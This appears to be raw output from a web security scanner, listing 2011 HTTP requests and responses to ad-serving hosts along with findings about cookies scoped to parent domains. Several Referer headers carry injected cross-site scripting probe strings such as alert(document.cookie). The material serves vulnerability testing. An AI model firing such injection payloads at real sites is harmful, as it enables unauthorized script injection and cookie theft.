GET /OzoDB/cutils/R52_9/jsc/1302/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2848445226 Cache-Control: max-age=2330250 Expires: Thu, 24 Feb 2011 16:44:13 GMT Date: Fri, 28 Jan 2011 17:26:43 GMT Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /OzoDB/cutils/R52_9/jsc/951/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2884195688 Cache-Control: max-age=2286960 Expires: Thu, 24 Feb 2011 16:41:30 GMT Date: Sat, 29 Jan 2011 05:25:30 GMT Connection: close
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,2,9:826,187,14:951,7,14:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=20:10:11:4:5:9:0:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:1,26,1;expires=Sun, 27 Feb 2011 23:16:42 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sat, 28 Jan 2012 23:16:42 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=58:30:43:20:19:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1;expires=Mon, 28 Feb 2011 03:21:37 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sun, 29 Jan 2012 03:21:37 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ZFFAbh=749B826,20|1483_759#365;expires=Sat, 28 Jan 2012 21:57:38 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
PI=h1037004Za883605Zc826000187,826000187Zs173Zt128;expires=Mon, 28 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Location: http:// Server: JBird/1.0b Date: Fri, 28 Jan 2011 16:46:03 GMT Connection: close Set-Cookie: c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63722/0/vj?ajecscp=1296224075221&z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=Aa
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 14:14:34 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Content-Type: application/x-javascript Set-Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/ Set-Cookie: i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693 Set-Cookie: ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/
document.write("<"+"script language=\"JavaScript\">\n"); document.write("var zflag_nid=\"1220\"; var zflag_cid=\"101\"; var zflag_sid=\"69\"; var zflag_width=\"300\"; var zflag_height=\"250\"; var zfl ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Location: http:// Server: JBird/1.0b Date: Fri, 28 Jan 2011 16:46:05 GMT Connection: close Set-Cookie: c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 14:48:31 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Content-Type: application/x-javascript Set-Cookie: i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693 Set-Cookie: ajcmp=20236X631Sh003KAA;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:48:32 GMT;Path=/
document.write("<"+"script language=\"JavaScript\">\n"); document.write("var zflag_nid=\"1220\"; var zflag_cid=\"167\"; var zflag_sid=\"126\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zfl ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Location: http:// Server: JBird/1.0b Date: Fri, 28 Jan 2011 17:26:43 GMT Connection: close Set-Cookie: c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:41:43 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Content-Type: application/x-javascript Set-Cookie: i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689 Set-Cookie: ajcmp=20236X00631Sh00PZ;Max-Age=63072000;expires=Sun, 27 Jan 2013 16:41:44 GMT;Path=/
document.write("<"+"!--Iframe Tag -->\n"); document.write("<"+"!-- begin ZEDO for channel: HLW on MB - CPM , publisher: MB Network , Ad Dimension: Medium Rectangle - 300 x 250 -->\n"); document.write ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly Date: Fri, 28 Jan 2011 14:14:29 GMT Content-Length: 802
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html?sfcid=70180000000fUSJ HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly Location: http:/www.clickability.com/campaigns/Express_Datasheet.html?sfcid=70180000000fUSJ Date: Fri, 28 Jan 2011 16:46:18 GMT Content-Length: 0 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getuid HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;
Response
